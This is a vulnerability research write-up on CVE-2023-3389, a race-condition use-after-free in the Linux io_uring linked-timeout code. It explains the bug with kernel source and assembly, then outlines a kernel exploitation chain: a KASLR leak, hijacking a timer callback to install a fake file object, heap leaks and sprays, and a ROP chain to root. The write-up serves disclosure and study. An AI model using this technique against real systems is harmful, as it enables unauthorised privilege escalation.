CVE-2023-3389 - LinkedPoll

Exploiting a vulnerability in the io_uring subsystem of the Linux kernel.

Introduction

In this post I will dive into a bug I discovered in the io_uring subsystem, which involves racing and canceling a linked timeout.
But first, why io_uring?
One of the driving factors behind my explo(ration/itation) of this subsystem is Google’s kCTF program. This unique initiative offers substantial rewards, up to $133,337 for successfully exploiting a Linux kernel bug within a nsjail environment. Motivated by the prospect of participating in this program, I began researching previous write-ups and interestingly, a lot of them targeted io_uring. Also, time was of the essence, as Google was preparing to make changes to the program, which would disable the io_uring for the most lucrative bounties. With this deadline looming, I embarked on my journey to uncover yet another vulnerability in the io_uring subsystem.

IO_URING

Tons of writeups have already explained (and exploited) various parts of the io_uring subsystem better than I ever could so please read them:

In this post I aim to build upon these and specifically CVE-2022-29582, due to the similarities with timeouts.

Within io_uring there are a lot of different operations one can use (40 in v5.15.89). I will just explain the relevant parts of the ones I used to trigger and exploit the bug.

Asynchronous Requests

For this post its just important to know that operations can be executed simultaneously using this flag.

IORING_OP_TIMEOUT

The IORING_OP_TIMEOUT operation allows developers to use timeouts. More information can be found in CVE-2022-29582#timeout-operations-ioring_op_timeout.

IORING_OP_LINK_TIMEOUT

The IORING_OP_LINK_TIMEOUT operation allows developers to add a timeout to the previous request in the chain. This request is first prepped and then armed.
Since sqe (submission queue entry) can be evaluated in various contexts (asynchronous, syscall), the preparation and arming of such a request may occur in different location:

        
      
static void __io_queue_sqe(struct io_kiocb *req)
	__must_hold(&req->ctx->uring_lock)
{
	struct io_kiocb *linked_timeout;
	int ret;

issue_sqe:
	ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);
    // ...
	if (likely(!ret)) {
		linked_timeout = io_prep_linked_timeout(req);
		if (linked_timeout)
			io_queue_linked_timeout(linked_timeout);
    } else if (ret == -EAGAIN && !(req->flags & REQ_F_NOWAIT)) {
		linked_timeout = io_prep_linked_timeout(req);

		switch (io_arm_poll_handler(req)) {
		case IO_APOLL_READY:
			if (linked_timeout)
				io_queue_linked_timeout(linked_timeout);
			goto issue_sqe;
            
            // ...
		}

		if (linked_timeout)
			io_queue_linked_timeout(linked_timeout);
    }
    // ...
}

        
      
static void io_wq_submit_work(struct io_wq_work *work)
{
	struct io_kiocb *req = container_of(work, struct io_kiocb, work);
	struct io_kiocb *timeout;
	int ret = 0;

	// ...

	timeout = io_prep_linked_timeout(req);
	if (timeout)
		io_queue_linked_timeout(timeout);

    // ...

	if (!ret) {
		do {
			ret = io_issue_sqe(req, 0);
			// ..
        } while (1);
    }
    // ...
}

        
      
static void io_queue_async_work(struct io_kiocb *req, bool *locked)
{
	struct io_ring_ctx *ctx = req->ctx;
	struct io_kiocb *link = io_prep_linked_timeout(req);
    // ...
    io_wq_enqueue(tctx->io_wq, &req->work);
	if (link)
		io_queue_linked_timeout(link);
    // ...
}

Notice how all of these requests first call io_prep_linked_timeout before calling io_issue_sqe / io_wq_enqueue except for __io_queue_sqe.

Lets look a bit closer at the io_prep_linked_timeout method:

        
      
static inline struct io_kiocb *io_prep_linked_timeout(struct io_kiocb *req)
{
	if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT)))
		return NULL;
	return __io_prep_linked_timeout(req);
}

static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
	if (WARN_ON_ONCE(!req->link))
		return NULL;

	req->flags &= ~REQ_F_ARM_LTIMEOUT;
	req->flags |= REQ_F_LINK_TIMEOUT;

	/* linked timeouts should have two refs once prep'ed */
	io_req_set_refcount(req);
	__io_req_set_refcount(req->link, 2);
	return req->link;
}

It becomes clear that a request can only be prepped if it has the REQ_F_ARM_LTIMEOUT flag (ready to be armed) and will then transition to the REQ_F_LINK_TIMEOUT flag (indicating the request has been armed).

Lets look a bit closer at the io_queue_linked_timeout method:

        
      
static void io_queue_linked_timeout(struct io_kiocb *req)
{
	struct io_ring_ctx *ctx = req->ctx;

	spin_lock_irq(&ctx->timeout_lock);
	/*
	 * If the back reference is NULL, then our linked request finished
	 * before we got a chance to setup the timer
	 */
	if (req->timeout.head) {
		struct io_timeout_data *data = req->async_data;

		data->timer.function = io_link_timeout_fn;
		hrtimer_start(&data->timer, timespec64_to_ktime(data->ts),
				data->mode);
		list_add_tail(&req->timeout.list, &ctx->ltimeout_list);
	}
	spin_unlock_irq(&ctx->timeout_lock);
	/* drop submission reference */
	io_put_req(req);
}

This will start the linked timeout and add it to the ctx->ltimeout_list list.

IORING_OP_TIMEOUT_REMOVE

This operation allows developers to remove / cancel regular timeouts and update regular and linked timeouts. Updating works as follows:

        
      
static int io_timeout_update(struct io_ring_ctx *ctx, __u64 user_data,
			     struct timespec64 *ts, enum hrtimer_mode mode)
	__must_hold(&ctx->timeout_lock)
{
	struct io_kiocb *req = io_timeout_extract(ctx, user_data);
	struct io_timeout_data *data;

	if (IS_ERR(req))
		return PTR_ERR(req);

	req->timeout.off = 0; /* noseq */
	data = req->async_data;
	list_add_tail(&req->timeout.list, &ctx->timeout_list);
	hrtimer_init(&data->timer, io_timeout_get_clock(data), mode);
	data->timer.function = io_timeout_fn;
	hrtimer_start(&data->timer, timespec64_to_ktime(*ts), mode);
	return 0;
}

static int io_linked_timeout_update(struct io_ring_ctx *ctx, __u64 user_data,
				    struct timespec64 *ts, enum hrtimer_mode mode)
	__must_hold(&ctx->timeout_lock)
{
	struct io_timeout_data *io;
	struct io_kiocb *req;
	bool found = false;

	list_for_each_entry(req, &ctx->ltimeout_list, timeout.list) {
		found = user_data == req->user_data;
		if (found)
			break;
	}
	if (!found)
		return -ENOENT;

	io = req->async_data;
	if (hrtimer_try_to_cancel(&io->timer) == -1)
		return -EALREADY;
	hrtimer_init(&io->timer, io_timeout_get_clock(io), mode);
	io->timer.function = io_link_timeout_fn;
	hrtimer_start(&io->timer, timespec64_to_ktime(*ts), mode);
	return 0;
}

For linked timeouts it first tries to find the ltimeout in the ctx->ltimeout_list, while io_timeout_extract locates the timeouts in ctx->timeout_list. Other than that the functions could be used interchangeably if a regular timeout is somehow able to get into the ctx->ltimeout_list.

IORING_OP_POLL_ADD

The IORING_OP_POLL_ADD operation allows developers to use polling.

IORING_OP_POLL_REMOVE

The IORING_OP_POLL_REMOVE operation allows developers to remove / update poll requests. It works by first finding the poll request, based on the provided user_data (io_poll_find) and subsequently cancels the request by invoking io_req_complete with that poll request, which in turn calls __io_req_complete and io_req_complete_post:

        
      
static int io_poll_update(struct io_kiocb *req, unsigned int issue_flags)
{
	struct io_ring_ctx *ctx = req->ctx;
	struct io_kiocb *preq;
	int ret2, ret = 0;

	spin_lock(&ctx->completion_lock);
	preq = io_poll_find(ctx, req->poll_update.old_user_data, true);
	if (!preq || !io_poll_disarm(preq)) {
		spin_unlock(&ctx->completion_lock);
		ret = preq ? -EALREADY : -ENOENT;
		goto out;
	}
	spin_unlock(&ctx->completion_lock);

	// ...
	req_set_fail(preq);
	io_req_complete(preq, -ECANCELED);
out:
	if (ret < 0)
		req_set_fail(req);
	/* complete update request, we're done with it */
	io_req_complete(req, ret);
	return 0;
}

        
      
static void io_req_complete_post(struct io_kiocb *req, s32 res,
				 u32 cflags)
{
	struct io_ring_ctx *ctx = req->ctx;

	spin_lock(&ctx->completion_lock);
	__io_fill_cqe(ctx, req->user_data, res, cflags);
	/*
	 * If we're the last reference to this request, add to our locked
	 * free_list cache.
	 */
	if (req_ref_put_and_test(req)) {
		if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
			if (req->flags & IO_DISARM_MASK)
				io_disarm_next(req);
			if (req->link) {
				io_req_task_queue(req->link);
				req->link = NULL;
			}
		}
		io_dismantle_req(req);
		io_put_task(req->task, 1);
		list_add(&req->inflight_entry, &ctx->locked_free_list);
		ctx->locked_free_nr++;
	} else {
		if (!percpu_ref_tryget(&ctx->refs))
			req = NULL;
	}
	io_commit_cqring(ctx);
	spin_unlock(&ctx->completion_lock);

	if (req) {
		io_cqring_ev_posted(ctx);
		percpu_ref_put(&ctx->refs);
	}
}

This method completes the current request and creates a new cqe. Afterwards it calls io_disarm_next:

        
      
static bool io_disarm_next(struct io_kiocb *req)
	__must_hold(&req->ctx->completion_lock)
{
	bool posted = false;

	if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
		struct io_kiocb *link = req->link;

		req->flags &= ~REQ_F_ARM_LTIMEOUT;
		if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
			io_remove_next_linked(req);
			io_fill_cqe_req(link, -ECANCELED, 0);
			io_put_req_deferred(link);
			posted = true;
		}
	} else if (req->flags & REQ_F_LINK_TIMEOUT) { // [2]
		struct io_ring_ctx *ctx = req->ctx;

		spin_lock_irq(&ctx->timeout_lock);
		posted = io_kill_linked_timeout(req);
		spin_unlock_irq(&ctx->timeout_lock);
	}
	if (unlikely((req->flags & REQ_F_FAIL) &&
		     !(req->flags & REQ_F_HARDLINK))) {
		posted |= (req->link != NULL);
		io_fail_links(req);
	}
	return posted;
}

Taking the first path [1], the request is checked for the ready to be armed flag. If it has the flag, the flag is removed, and the request is subsequently completed. The second path [2], on the other hand, checks whether the request has already been armed. In such a scenario, the linked request (ltimeout) is canceled accordingly.
Looks good right?

Important to note here is that the chain of functions here are all called directly after each other, which is different compared to other cancel requests, i.e IORING_OP_TIMEOUT_REMOVE:

        
      
static int io_timeout_remove(struct io_kiocb *req, unsigned int issue_flags)
{
	struct io_timeout_rem *tr = &req->timeout_rem;
	struct io_ring_ctx *ctx = req->ctx;
	int ret;

	if (!(req->timeout_rem.flags & IORING_TIMEOUT_UPDATE)) {
		spin_lock(&ctx->completion_lock);
		spin_lock_irq(&ctx->timeout_lock);
		ret = io_timeout_cancel(ctx, tr->addr);
		spin_unlock_irq(&ctx->timeout_lock);
		spin_unlock(&ctx->completion_lock);
	}
	// ...
}

        
      
static int io_timeout_cancel(struct io_ring_ctx *ctx, __u64 user_data)
	__must_hold(&ctx->completion_lock)
	__must_hold(&ctx->timeout_lock)
{
	struct io_kiocb *req = io_timeout_extract(ctx, user_data);

	if (IS_ERR(req))
		return PTR_ERR(req);

	req_set_fail(req);
	io_fill_cqe_req(req, -ECANCELED, 0);
	io_put_req_deferred(req);
	return 0;
}

Which calls io_put_req_deferred:

        
      
static inline void io_put_req_deferred(struct io_kiocb *req)
{
	if (req_ref_put_and_test(req)) {
		req->io_task_work.func = io_free_req_work;
		io_req_task_work_add(req);
	}
}

Which eventually also calls io_disarm_next, but its executed as task_work, which has some delay.

LinkedPoll

Now, having gained some insight into the various operations let’s dive into what occurs when we introduce concurrency.
Remember the io_disarm_next:

        
      
static bool io_disarm_next(struct io_kiocb *req)
	__must_hold(&req->ctx->completion_lock)
{
	bool posted = false;

	if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
		struct io_kiocb *link = req->link;

		req->flags &= ~REQ_F_ARM_LTIMEOUT;
		if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
			io_remove_next_linked(req);
			io_fill_cqe_req(link, -ECANCELED, 0);
			io_put_req_deferred(link);
			posted = true;
		}
	} else if (req->flags & REQ_F_LINK_TIMEOUT) { // [2]
		struct io_ring_ctx *ctx = req->ctx;

		spin_lock_irq(&ctx->timeout_lock);
		posted = io_kill_linked_timeout(req);
		spin_unlock_irq(&ctx->timeout_lock);
	}
	if (unlikely((req->flags & REQ_F_FAIL) &&
		     !(req->flags & REQ_F_HARDLINK))) {
		posted |= (req->link != NULL);
		io_fail_links(req);
	}
	return posted;
}

and the io_prep_linked_timeout:

        
      
static inline struct io_kiocb *io_prep_linked_timeout(struct io_kiocb *req)
{
	if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT))) // [3]
		return NULL;
	return __io_prep_linked_timeout(req);
}

static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
	if (WARN_ON_ONCE(!req->link))
		return NULL;

	req->flags &= ~REQ_F_ARM_LTIMEOUT;
	req->flags |= REQ_F_LINK_TIMEOUT;

	/* linked timeouts should have two refs once prep'ed */
	io_req_set_refcount(req);
	__io_req_set_refcount(req->link, 2); // [4]
	return req->link;
}

Now, what would happen when we could somehow arm a linked timeout while canceling it at the same time. In this case we would take the first path in the io_disarm_next function [1] (Not yet armed), and we would also pass the check in io_prep_linked_timeout ([3]), after which the io_queue_linked_timeout would actually start the timer. After this point, we would have a timer running while its parent request has already been completed.

%%{init: {'noteMargin':13}}%%
sequenceDiagram
    participant t1 as Thread 1 (io_disarm_next)
    participant t2 as Thread 2 (io_prep_linked_timeout)
    t1->t2: - 
    Note over t1: if (req->flags & REQ_F_ARM_LTIMEOUT) {
    Note over t2: if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT)))
    Note over t1: req->flags &= ~REQ_F_ARM_LTIMEOUT;
    Note over t2: req->flags &= ~REQ_F_ARM_LTIMEOUT;
    Note over t2: req->flags |= REQ_F_LINK_TIMEOUT;
    Note over t2: io_queue_linked_timeout(timeout)

    Note over t1: io_remove_next_linked(req);

    Note over t1: ...
    Note over t2: ...

    t1->t2: -

The linked timeout is still being queued despite its parent being disarmed.

But, how do we actually cancel a linked timeout while simultaneously arming it?
Introducing IORING_OP_POLL_ADD and IORING_OP_POLL_REMOVE. As seen before, using IORING_OP_POLL_REMOVE to cancel a IORING_OP_POLL_ADD request cancels the request inline (Doesn’t involve extra task work). This in combination with queueing the request via __io_queue_sqe, means that first the request is evaluated, then the ltimeout is armed, meaning that if we use a well timed cancel request (asynchronous), we could trigger the path described earlier.

From now on, I’ll refer to our dangling linked timeout as ltimeout

However, let’s pause for a moment and take notice of the io_remove_next_linked function:

        
      
static bool io_disarm_next(struct io_kiocb *req)
	__must_hold(&req->ctx->completion_lock)
{
	bool posted = false;

	if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
		struct io_kiocb *link = req->link;

		req->flags &= ~REQ_F_ARM_LTIMEOUT;
		if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
			io_remove_next_linked(req); // [5]
			// ...
		} // ...
	} // ...
}
static inline void io_remove_next_linked(struct io_kiocb *req)
{
	struct io_kiocb *nxt = req->link;

	req->link = nxt->link;
	nxt->link = NULL;
}

static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
	if (WARN_ON_ONCE(!req->link))
		return NULL;

	req->flags &= ~REQ_F_ARM_LTIMEOUT;
	req->flags |= REQ_F_LINK_TIMEOUT;

	/* linked timeouts should have two refs once prep'ed */
	io_req_set_refcount(req);
	__io_req_set_refcount(req->link, 2); // [4]
	return req->link;
}

In this context req->link is our ltimeout, and so it sets req->link = ltimeout->link, which effectively removes the reference to ltimeout. Meaning that io_prep_linked_timeout could return ltimeout->link if we’re unlucky, which is fine because we can ensure its NULL, but __io_req_set_refcount(req->link, 2); ([4]) is a problem because it almost surely does a NULL pointer dereference. Lets analyse this further and look at how this is all implemented in assembly:

io_disarm_next:

        
      
00008e01:  test    eax, 0x100000
00008e06:  je      0x8e4b

00008e08:  mov     edx, eax
00008e0a:  mov     rbp, qword [rdi+0x70]
00008e0e:  and     edx, 0xffefffff        ; [1]
00008e14:  mov     dword [rdi+0x58], edx
00008e17:  test    rbp, rbp
00008e1a:  je      0x8edc

00008e20:  cmp     byte [rbp+0x48], 0xf
00008e24:  je      0x8f7b
...
00008f7b:  mov     rax, qword [rbp+0x70]
00008f7f:  mov     edx, 0xffffff83
00008f84:  mov     qword [rdi+0x70], rax  ; [2]
00008f88:  mov     rsi, qword [rbp+0x68]
00008f8c:  mov     qword [rbp+0x70], 0x0

So it takes 8 instructions to set req->link = ltimeout->link.

__io_queue_sqe -> __io_prep_linked_timeout:

        
      
00010279:  test    eax, 0x100000          ; [3]
0001027e:  je      0x1024d

00010280:  mov     rdi, r12
00010283:  call    __io_prep_linked_timeout

__io_prep_linked_timeout:
00001af0:  call    __fentry__
00001af5:  mov     rax, qword [rdi+0x70]  ; [4]
00001af9:  test    rax, rax               ; if (WARN_ON_ONCE(!req->link))
00001afc:  je      0x1b4d                 ;     return NULL;

00001afe:  mov     ecx, dword [rdi+0x58]
00001b01:  mov     edx, ecx
00001b03:  and     edx, 0xffefffff        ; req->flags &= ~REQ_F_ARM_LTIMEOUT;
00001b09:  and     ecx, 0x80000           ; req->flags |= REQ_F_LINK_TIMEOUT;
00001b0f:  je      0x1b3b                 ; io_req_set_refcount(req);

00001b11:  or      dh, 0x10
00001b14:  mov     dword [rdi+0x58], edx

00001b17:  mov     edx, dword [rax+0x58]
00001b1a:  test    edx, 0x80000
00001b20:  jne     0x1b36

00001b22:  or      edx, 0x80000
00001b28:  mov     dword [rax+0x5c], 0x2  ; __io_req_set_refcount(req->link, 2);
00001b2f:  mov     dword [rax+0x58], edx  ; req->flags |= REQ_F_REFCOUNT;
00001b32:  mov     rax, qword [rdi+0x70]  ; return req->link;

00001b36:  jmp     __x86_return_thunk

__fentry__:
#ifdef CONFIG_DYNAMIC_FTRACE

SYM_FUNC_START(__fentry__)
	RET
SYM_FUNC_END(__fentry__)
EXPORT_SYMBOL(__fentry__)
; ...
#endif

In the .config we’re given CONFIG_DYNAMIC_FTRACE=y is set so __fentry__ is only RET

This means we’re lucky! It reuses / optimized rax from the beginning of the function when checking for req->link = NULL to calling __io_req_set_refcount(req->link, 2); and thus the race window becomes a bit more favourable.
Let’s assume worst case scenario and assume that the test at __io_queue_sqe ([3]) is done at the same time as removing the flag in io_disarm_next ([1]). For io_disarm_next there are 8 instructions before it sets req->link = ltimeout->link, while there are only 6 instructions to reach setting rax = req->link ([4]) (But lets hope our CPU does some optimizations regarding the call __fentry__).
While we can’t just assume that this will be fine, because 6 < 8 (due to instruction clock cycles and CPU optimizations). In practice, I have never actually been able to trigger req->link = ltimeout->link before setting rax = req->link.

Exploitation

Triggered?

Now knowing how to successfully trigger the bug, the challenge now lies in identifying whether the bug has actually been triggered. This is crucial, because the race window is extremely tight, and it often (Depending on CPU) requires numerous attempts to trigger the bug. Moreover, repeatedly redoing the entire exploitation phase, including heap feng shui and other steps, for each try can be extremely time-consuming.

So does our free’d linked timeout leave some dirt behind?
Let’s look a bit closer at the IORING_OP_LINK_TIMEOUT from the previous section. We’ve seen that the ltimeout is added to the ctx->ltimeout_list, however, its not actually removed from the list (Because according to io_disarm_next it was not yet armed). So this is a way for us to figure out if we’ve triggered it.
In short, there is still a reference to the linked timeout in the ctx->ltimeout_list, meaning that we could execute a IORING_OP_TIMEOUT_REMOVE with LINKED_TIMEOUT flag, which would cancel our free’d ltimeout.
But this is not actually what we want, we want to keep our ltimeout alive. Thankfully, io_uring reuses free’d requests and adds them to a locked_free_list once they are completed as seen in io_req_complete_post;

Which is later flushed when calling io_alloc_req, this in turn calls io_flush_cached_reqs and it finally calls io_flush_cached_locked_reqs and joins the ctx->locked_free_list and the ctx->submit_state.free_list:

        
      
/*
 * A request might get retired back into the request caches even before opcode
 * handlers and io_issue_sqe() are done with it, e.g. inline completion path.
 * Because of that, io_alloc_req() should be called only under ->uring_lock
 * and with extra caution to not get a request that is still worked on.
 */
static struct io_kiocb *io_alloc_req(struct io_ring_ctx *ctx)
	__must_hold(&ctx->uring_lock)
{
	// ...
	BUILD_BUG_ON(ARRAY_SIZE(state->reqs) < IO_REQ_ALLOC_BATCH);

	if (likely(state->free_reqs || io_flush_cached_reqs(ctx)))
		goto got_req;

	// ...
got_req:
	state->free_reqs--;
	return state->reqs[state->free_reqs];
}

/* Returns true IFF there are requests in the cache */
static bool io_flush_cached_reqs(struct io_ring_ctx *ctx)
{
	struct io_submit_state *state = &ctx->submit_state;
	int nr;

	/*
	 * If we have more than a batch's worth of requests in our IRQ side
	 * locked cache, grab the lock and move them over to our submission
	 * side cache.
	 */
	if (READ_ONCE(ctx->locked_free_nr) > IO_COMPL_BATCH) // IO_COMPL_BATCH == 32
		io_flush_cached_locked_reqs(ctx, state);

	nr = state->free_reqs;
	while (!list_empty(&state->free_list)) {
		struct io_kiocb *req = list_first_entry(&state->free_list,
					struct io_kiocb, inflight_entry);

		list_del(&req->inflight_entry);
		state->reqs[nr++] = req;
		if (nr == ARRAY_SIZE(state->reqs))
			break;
	}

	state->free_reqs = nr;
	return nr != 0;
}
i
static void io_flush_cached_locked_reqs(struct io_ring_ctx *ctx,
					struct io_submit_state *state)
{
	spin_lock(&ctx->completion_lock);
	list_splice_init(&ctx->locked_free_list, &state->free_list);
	ctx->locked_free_nr = 0;
	spin_unlock(&ctx->completion_lock);
}

So our ltimeout is in the ctx->locked_free_list when its being free’d, to figure out whether the bug has been triggered we can spray a ton of IORING_OP_TIMEOUT requests and reclaim the ltimeout in the ctx->ltimeout_list as a IORING_OP_TIMEOUT, then we can add a single IORING_OP_TIMEOUT_REMOVE with the LINKED_TIMEOUT flag.

Here I stumbled on a small difference, I initially compiled the kernel with gcc, while the actual kernel was compiled with clang and with the gcc version, it was enough to only spray 64 objects, while for the actual version it took way more.

Then when the remove request is being executed it will try to find the ltimeout in the ctx->ltimeout_list list (At this time its actually just a regular timeout) and if it succeeds, meaning we’ve triggered the UAF, it will just update the regular timeout.
Thankfully the update functions for the two different timeout operations are very similar and can be called interchangeably as seen before.

Replacing the ltimeout

I hoped to exploit the bug in similar fashion to CVE-2022-29582, sadly it took me a very long time to figure out the following:

        
      
static int calculate_sizes(struct kmem_cache *s, int forced_order)
{
	//...
	/*
	* Store freelist pointer near middle of object to keep
	* it away from the edges of the object to avoid small
	* sized over/underflows from neighboring allocations.
	*/
	s->offset = ALIGN_DOWN(s->object_size / 2, sizeof(void *));
	//...
}

$ pahole io_timeout_data ./vmlinux -E 2> /dev/null

        
      
struct io_timeout_data {
        struct io_kiocb *          req;                                                  /*     0     8 */
        struct hrtimer {
                struct timerqueue_node {
                        struct rb_node {
                                long unsigned int __rb_parent_color;                     /*     8     8 */
                                struct rb_node * rb_right;                               /*    16     8 */
                                struct rb_node * rb_left;                                /*    24     8 */
                        } node; /*     8    24 */
                        /* typedef ktime_t -> s64 -> __s64 */ long long int expires;     /*    32     8 */
                } node; /*     8    32 */
                /* typedef ktime_t -> s64 -> __s64 */ long long int      _softexpires;   /*    40     8 */
                enum hrtimer_restart (*function)(struct hrtimer *);                      /*    48     8 */
                struct hrtimer_clock_base * base;                                        /*    56     8 */
                /* --- cacheline 1 boundary (64 bytes) --- */
                /* typedef u8 -> __u8 */ unsigned char      state;                       /*    64     1 */
                /* typedef u8 -> __u8 */ unsigned char      is_rel;                      /*    65     1 */
                /* typedef u8 -> __u8 */ unsigned char      is_soft;                     /*    66     1 */
                /* typedef u8 -> __u8 */ unsigned char      is_hard;                     /*    67     1 */
        } timer; /*     8    64 */

        /* XXX last struct has 4 bytes of padding */

        struct timespec64 {
                /* typedef time64_t -> __s64 */ long long int      tv_sec;               /*    72     8 */
                long int           tv_nsec;                                              /*    80     8 */
        } ts; /*    72    16 */
        enum hrtimer_mode          mode;                                                 /*    88     4 */
        /* typedef u32 -> __u32 */ unsigned int               flags;                     /*    92     4 */

        /* size: 96, cachelines: 2, members: 5 */
        /* paddings: 1, sum paddings: 4 */
        /* last cacheline: 32 bytes */
};

So after kfree is called on our io_timeout_data object, the freelist pointer is placed at the exact same offset (96/2 = 48) as the hrtimer_restart pointer, therefore there is no way to trigger the io_link_timeout_fn.

kASLR

With the above idea failing, a new idea is to control the heap such that the previously free’d request->async_data lies under our control. The goal is to control almost a full kmalloc-96 object because the rbtree properties lie in the first few bytes of the object. Secondly, we’d need a kASLR leak to find a function to call.

Thankfully, theres no need to overcomplicate things, because there exists a full kaslr leak up till ~v6.2, called entrybleed, more details here. Now, when the timer is succesfully reallocated, its possible to call anything once, where the first parameter is a reference to the timer itself, and the initial bytes are beyond our control (Due to timer constraints). Sadly, I could not find any gadgets that could simply call a full ROP chain.

Dirty File

Before going further lets take a look at how our arbitrary function is actually called:

        
      
static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
			  struct hrtimer_clock_base *base,
			  struct hrtimer *timer, ktime_t *now,
			  unsigned long flags) __must_hold(&cpu_base->lock)
{
	//...
	__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
	fn = timer->function;
	//...

	restart = fn(timer);

	//...

	/*
	 * Note: We clear the running state after enqueue_hrtimer and
	 * we do not reprogram the event hardware. Happens either in
	 * hrtimer_start_range_ns() or in hrtimer_interrupt()
	 *
	 * Note: Because we dropped the cpu_base->lock above,
	 * hrtimer_start_range_ns() can have popped in and enqueued the timer
	 * for us already.
	 */
	if (restart != HRTIMER_NORESTART &&
	    !(timer->state & HRTIMER_STATE_ENQUEUED))
		enqueue_hrtimer(timer, base, HRTIMER_MODE_ABS);

	//...
}

static void __remove_hrtimer(struct hrtimer *timer,
			     struct hrtimer_clock_base *base,
			     u8 newstate, int reprogram)
{
	// ...
	WRITE_ONCE(timer->state, newstate);
	if (!(state & HRTIMER_STATE_ENQUEUED))
		return;

	if (!timerqueue_del(&base->active, &timer->node))
		cpu_base->active_bases &= ~(1 << base->index);

	// ...
}

The __run_hrtimer function first makes sure to remove our timer from the rbtree by calling __remove_hrtimer, which makes sure the HRTIMER_STATE_ENQUEUED flag is set and will gracefully remove the timer and overwrite the timer->state with HRTIMER_STATE_INACTIVE. It is essential to remove the timer to avoid calling the same function infinitely many times, which is very bad, so we need to set the HRTIMER_STATE_ENQUEUED state.

Then __run_hrtimer calls our function and only if it returned HRTIMER_NORESTART (0x00) and our state does not have the HRTIMER_STATE_ENQUEUED flag set (it was just overwritten), it doesn’t enqueue the timer again.
So in summary besides our single function call, our function needs to return 0x00. The way to exploit this is to install a fake file object and control it.
To do this we want to call fd_install:

        
      
/*
 * Install a file pointer in the fd array.
 *
 * The VFS is full of places where we drop the files lock between
 * setting the open_fds bitmap and installing the file in the file
 * array.  At any such point, we are vulnerable to a dup2() race
 * installing a file in the array before us.  We need to detect this and
 * fput() the struct file we are about to overwrite in this case.
 *
 * It should never happen - if we allow dup2() do it, _really_ bad things
 * will follow.
 *
 * This consumes the "file" refcount, so callers should treat it
 * as if they had called fput(file).
 */

void fd_install(unsigned int fd, struct file *file)

And in our case we call receive_fd:

        
      
int receive_fd(struct file *file, unsigned int o_flags)
{
	return __receive_fd(file, NULL, o_flags);
}

/**
 * __receive_fd() - Install received file into file descriptor table
 * @file: struct file that was received from another process
 * @ufd: __user pointer to write new fd number to
 * @o_flags: the O_* flags to apply to the new fd entry
 *
 * Installs a received file into the file descriptor table, with appropriate
 * checks and count updates. Optionally writes the fd number to userspace, if
 * @ufd is non-NULL.
 *
 * This helper handles its own reference counting of the incoming
 * struct file.
 *
 * Returns newly install fd or -ve on error.
 */
int __receive_fd(struct file *file, int __user *ufd, unsigned int o_flags)
{
	int new_fd;
	int error;

	error = security_file_receive(file);
	if (error)
		return error;

	new_fd = get_unused_fd_flags(o_flags);
	if (new_fd < 0)
		return new_fd;

	if (ufd) {
		error = put_user(new_fd, ufd);
		if (error) {
			put_unused_fd(new_fd);
			return error;
		}
	}

	fd_install(new_fd, get_file(file));
	__receive_sock(file);
	return new_fd;
}

And luckily __receive_fd:

Returns newly install fd or -ve on error.

By calling close on fd-0 (stdin) before the timer fires, we can ensure that the function returns 0x00.

After __receive_fd has been called and our dirty file has been installed, the initial UAF has been transformed into an UAF on a struct file object, which is much more useful.

sizeof(struct file) == 232 so to control every field of the struct file object we need to control ceil(232 / 92) == 3 objects.

f_ops / Heap leak

Before we continue, what can we actually do with the dirty file. Given that we control the first chunk of the file object, we can overwrite f_ops to point to some arbitrary function (As long as the kernel has a pointer to that function).

In this case it was the easiest to first get a heap leak and construct a ROP chain in the chunks following that one. To get a heap leak there exists netdev_init:

        
      
/* Initialize per network namespace state */
static int __net_init netdev_init(struct net *net)
{
	BUILD_BUG_ON(GRO_HASH_BUCKETS >
		     8 * sizeof_field(struct napi_struct, gro_bitmask));

	INIT_LIST_HEAD(&net->dev_base_head);

	net->dev_name_head = netdev_create_hash();
	if (net->dev_name_head == NULL)
		goto err_name;

	net->dev_index_head = netdev_create_hash();
	if (net->dev_index_head == NULL)
		goto err_idx;

	RAW_INIT_NOTIFIER_HEAD(&net->netdev_chain);

	return 0;

err_idx:
	kfree(net->dev_name_head);
err_name:
	return -ENOMEM;
}

This results in a ‘two-way’ heap leak. Firstly, it leaks the address of &net->dev_base_head due to the presence of INIT_LIST_HEAD. Secondly, net->dev_name_head, net->dev_index_head, and net->netdev_chain are truncated with null bytes, making it possible for us to detect their location. Its possible to detect these changes as long as we spray with a technique that allows us to read back what we sprayed; for example symlinks.
Another thing that helps us is that these two ‘changes’ are at are at different offsets, dev_base_head is at net+144 and dev_index_head at net+304, immediatly revealing the location of some sprayed chunks, 1 and 3 after our original base chunk.
To determine the base chunk, we can utilize dup to increment our f_count at file+56. With this adjustment, we can iterate through all the chunks under our control, obtaining the heap leak, and then match these chunks with their symlink indexes.

Initial Spray

With dev_index_head located at net+304, the goal is to gain control over ceil(304/92) = 4 consecutive chunks. To do this we first fill up the holes in the current CPU partial list and free some objects on a different CPU, ensuring the slabs of objects we don’t fully control land on another CPU partial list. Only then we can fill up some new slabs and free some objects, so the current CPU partial list is full of slabs of consecutive objects we control.
Because it takes some tries (and time) to trigger the bug it is required to redo this step every n tries.

Shell

Now to get RIP control we can free the first chunk and proceed to spray the first part of the ROP chain and repeat the process for the third chunk. Then lastly we also free our base chunk and spray our new f_ops pointing to our ROP chain. Finally giving us root.
Now as root its not yet possible to call system("sh"), because stdin (fd-0) still points to our dirty file, so lets just free and close it again.. Well, to do this we again need to reallocate our f_ops to some fops that does not implement flush (It probably panics if it does call it), call close(0) and then dup2(backup_fd_stdin, 0).
And finally we have a shell (and hope it doesn’t break within a few seconds because the rbtree of the timer is most likely still slightly broken).

Affected versions

Even though the bug seemed to be fixed in ~v6.0 (Taken from the 5.10 & 5.15 fix commit):

